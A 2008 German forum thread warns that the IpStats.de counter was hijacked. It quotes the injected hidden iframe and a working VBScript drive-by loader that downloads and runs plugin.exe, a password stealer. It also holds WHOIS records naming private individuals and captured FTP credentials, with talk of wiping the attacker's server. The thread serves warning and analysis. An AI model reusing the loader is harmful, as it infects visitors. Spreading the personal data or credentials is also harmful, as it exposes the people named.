IpStats.de gehackt!

**BLU2** · 05. 03. 2008, 15:08

Hi, baut bitte alle schnell eure Counter von Ipstats.de aus... es scheint so als wurde der Counter gehackt! Alle seiten die diesen Counter drinne haben leiten auf http://www.inside-layer.com und danach weiter auf Datenklo.net

Code:

document.write( '<div style="display:none;"><a href="http://www.ipstats.de">IPSTATS.DE - Kostenloser Besucher Counter ohne Anmeldung!</a></div>' );

document.write( '<a href="http://www.ipstats.de/v3/30tage/xxx.html" target="_blank"><img border="0" src="http://www.ipstats.de/button.png" alt="IPSTATS.DE - Kostenloser Besucher Counter ohne Anmeldung!"></a>' );

document.write( '<div style="display:none;"><img alt="IPSTATS.DE - Kostenloser Besucher Counter ohne Anmeldung!" border=0 src="http://www.ipstats.de/v3/count.php?u=xxx&ref=' + escape(document.referrer) + '"></div>' );

document.write( '<iframe src="http://www.inside-layer.com/index.php" width="1" height="1"></iframe>' );

hier zählt der counter von den entführten seitenbeuschern : http://www.ipcounter.de/stats.php?u=48007937

inside-layer.com :

Code:

<meta http-equiv="refresh" content="5;url=http://datenklo.net"/>
<body onLoad="if (top!=self) { top.location=self.location; }">
<script language="VBscript">
On Error Resume Next

url = "http://inside-layer.com/plugin.exe"
Set xml = document.createElement("object")
xml.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set HTP = xml.CreateObject("Microsoft.XMLHTTP", "")

S1 = "Ad"
S2 = "od"
S3 = "b."
S4 = "ST"
S5 = "re"
S6 = "am"

Set AdbS = xml.CreateObject(S1 & S2 & S3 & S4 & S5 & S6, "")
AdbS.Type = 1

HTP.open "GET", url, False
HTP.Send

Set FSO = xml.CreateObject("Scripting.FileSystemObject", "")
Set tmp = FSO.GetSpecialFolder(2)
FileName = FSO.GetFileName(url)
FileName = FSO.BuildPath(tmp, FileName)

AdbS.open
AdbS.write HTP.responseBody
AdbS.SaveToFile FileName, 2
AdbS.Close

Set WSH = xml.CreateObject("Shell.Application", "")
WSH.ShellExecute FileName, "", "", "open", 1

</Script>
<script type="text/javascript" src="http://www.ipcounter.de/count_js.php?u=48007937&amp;color=pink"></script>
<noscript><a href="http://www.ipcounter.de/stats.php?u=48007937" target="_blank"><img src="http://www.ipcounter.de/count.php?u=48007937&amp;color=pink" alt="IPCOUNTER.DE - Kostenloser Live Counter!" border="0" /></a></noscript>

ich habe mal ein backup der .exe datein gemacht http://xlice.net/file/c207d7d3196058...lugin.exe.html
achtung nicht downloaden! nur für leute die wissen was sie damit zutun haben!!!

whoisdaten von inside-layer.com 85.13.132.215 http://whois.to/inside-layer.com

Code:

DOMAIN: INSIDE-LAYER.COM

RSP: please see tech-contact below

created-date: 2008-02-05
updated-date: 2008-02-05
registration-expiration-date: 2009-02-05

owner-contact: P-HCD205
owner-fname: Hiam
owner-lname: Darwiche
owner-street: Minervastr.78
owner-city: Isselburg
owner-zip: 46419
owner-country: DE
owner-phone: +49 152 01985775
owner-email: info@blacksh.net

admin-contact: P-HCD205
admin-fname: Hiam
admin-lname: Darwiche
admin-street: Minervastr.78
admin-city: Isselburg
admin-zip: 46419
admin-country: DE
admin-phone: +49 152 01985775
admin-email: info@blacksh.net

tech-contact: P-WOK24
tech-organization: Neue Medien Muennich
tech-fname: Werner
tech-lname: Kaltofen
tech-street: Dorfstrasse 49
tech-city: Friedersdorf
tech-zip: 02742
tech-country: DE
tech-phone: +49 35872 35310
tech-fax: +49 35872 35330
tech-email: hostmaster@all-inkl.com

billing-contact: P-WOK24
billing-organization: Neue Medien Muennich
billing-fname: Werner
billing-lname: Kaltofen
billing-street: Dorfstrasse 49
billing-city: Friedersdorf
billing-zip: 02742
billing-country: DE
billing-phone: +49 35872 35310
billing-fax: +49 35872 35330
billing-email: hostmaster@all-inkl.com

nameserver: ns5.kasserver.com
nameserver: ns6.kasserver.com

die domain aus dem whois "info@blacksh.net" http://whois.to/blacksh.net führt zu firecooler !

Code:

Domain name: blacksh.net

Registrant Contact:
   Private
   Mike Makefeels (firecooler@gmx.net)
   +1.337
   Fax: +1.5555555555
   Main Street 42
   Washingston, US 12877
   US

Administrative Contact:
   Private
   Mike Makefeels (firecooler@gmx.net)
   +1.337
   Fax: +1.5555555555
   Main Street 42
   Washingston, US 12877
   US

Technical Contact:
   Private
   Mike Makefeels (firecooler@gmx.net)
   +1.337
   Fax: +1.5555555555
   Main Street 42
   Washingston, US 12877
   US

Status: Locked

Name Servers:
   dns1.name-services.com
   dns2.name-services.com
   dns3.name-services.com
   dns4.name-services.com
   dns5.name-services.com

blacksh.net liegt übrigens auf der gleichen IP wie datenklo.net -.-

mit freundlichen Grüßen
BLU2

**mp17** · 05. 03. 2008, 15:14

hm aber die statistik seiten gehen ja noch, immerhin, also braucht man sie nicht auszubauen ^^

//edit: lol hab ma versucht die plugin.exe runterzuladen, mein pc ist vor virusmeldungen fast abgestürzt

**_ONE_** · 05. 03. 2008, 16:14

hatte probleme mit meiner page hat imer weitergeleitet habs rausgebaut jetzt geht alles

**Annyn** · 05. 03. 2008, 16:21

Zitat von mp17

//edit: lol hab ma versucht die plugin.exe runterzuladen, mein pc ist vor virusmeldungen fast abgestürzt

Welche plugin.exe ?

**mp17** · 05. 03. 2008, 16:45

Zitat von BLU2

inside-layer.com :

Code:

<meta http-equiv="refresh" content="5;url=http://datenklo.net"/>
<body onLoad="if (top!=self) { top.location=self.location; }">
<script language="VBscript">
On Error Resume Next

url = "http://inside-layer.com/plugin.exe"
Set xml = document.createElement("object")
xml.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set HTP = xml.CreateObject("Microsoft.XMLHTTP", "")
...

Die exe Datei, den die weitergeleitete Website einbindet.

**BLU2** · 05. 03. 2008, 17:33

inzwischen ist der iframe code aus dem javascript vershcwunden

**devnull2600** · 05. 03. 2008, 18:40

Hallo BLU2,

Das blacksh.net gehören mir nicht, sondern einem Typen namens Samer Fakhro, ich denke es war das alles sein Werk, um die Missverständnisse auszuschließen.

MfG Firecooler

**layerstats** · 05. 03. 2008, 18:43

Hi,

wie und was genau da geschah, weiss ich leider selbst noch nicht...

Kann eventl. jemand sagen, seit wann dieses Problem mit der Weiterleitung auftrat und wer ist Samer Fakhro?

vG

**Kugelfisch23** · 05. 03. 2008, 19:20

Nach ersten Analysen in einem Honigtopf lädt die Plugin.exe lädt DoNotDelete.dat nach, was wohl ein Trojaner ist. Genauere Analysen stehen noch aus, es würde mich jedoch nicht wundern, wenn man da irgendwo versteckte FTP-Daten finden würde - der Server des Kiddies dürfte sich dann einigen DELE-Befehlen erfreuen

**mp17** · 05. 03. 2008, 19:43

jo ist geil mach mal ^^

**Kugelfisch23** · 05. 03. 2008, 21:15

Zitat von mp17

jo ist geil mach mal

VMWare-Honigtopf+Kabelhai sind nett...

Code:

220 FTP on dd8626.kasserver.com ready
USER w00985e7
331 Password required for w00985e7.
PASS 3cd1iutu
230 User w00985e7 logged in.

...bis vor etwa einer Stunde. Nun sagt der Server ganz was anderes...

Code:

220 FTP on dd8626.kasserver.com ready
USER w00985e7
331 Password required for w00985e7.
PASS 3cd1iutu
530 Login incorrect.

...das Kiddie, das seinen Super-1337-Passwort-Stealer so verteilt hat, hat wohl mitgelesen... Jetzt kann das Teil wenigstens keinen grösseren Schaden mehr anrichten

EDIT: Oh, ich sehe gerade, da war wohl einer `schneller`.

Zitat von http://inside-layer.com

hackers hacked by anti-hackers =)

**Fiete87** · 05. 03. 2008, 21:29

Wieso sollte man den Counter von IPstats verwenden?
Gibt doch weitaus Seriösere Mittel und Wege.

**brabbelj** · 05. 03. 2008, 21:30

Ein paar infos zu der Plugin.exe

Virustotal scan:
http://www.virustotal.com/de/analisi...4d810afdff69f7

ich habe desweiteren herrausgefunden

das sich der Paswordstealer V3 da drin befand.

mfg
brabbelj

**layerstats** · 05. 03. 2008, 22:13

Zitat von Fiete87

Wieso sollte man den Counter von IPstats verwenden?
Gibt doch weitaus Seriösere Mittel und Wege.

Was war denn bitte, vor dem Hack, unseriös?

vG

**mp17** · 05. 03. 2008, 22:28

ja eben ^^
vorallem ist doch die geilste lösung, wenn man zu faul ist nen extra script in die website einzubauen, hat man einfach den kleinen code rein fertig, finds geil

**nethiob** · 06. 03. 2008, 21:52

Zitat von Kugelfisch23

VMWare-Honigtopf+Kabelhai sind nett...

Code:

220 FTP on dd8626.kasserver.com ready
USER w00985e7
331 Password required for w00985e7.
PASS 3cd1iutu
230 User w00985e7 logged in.

...bis vor etwa einer Stunde. Nun sagt der Server ganz was anderes...

und wieviel daten hat der stealer auf dem bereits ftp gesammelt gehabt? hasts ja wohl gesehen...

und dumm wenn er deutschen pay-webspace als ziel-ftp nimmt.

**Kugelfisch23** · 06. 03. 2008, 21:58

Zitat von nethiob

und wieviel daten hat der stealer auf dem bereits ftp gesammelt gehabt? hasts ja wohl gesehen...

Leider nicht. Ich habe den Wireshark-Dump gemacht, danach musste ich für eine Stunde weg, und erst danach habe ich die Daten analysiert. Und da waren die Logindaten dann schon geändert...

Zitat von nethiob

und dumm wenn er deutschen pay-webspace als ziel-ftp nimmt.

1337-Kiddies, die vorgefertigte Programme verwenden, haben es meist an sich, dumm zu sein. Das ist ein fundamentales Naturgesetz ohne jegliche Ausnahmen...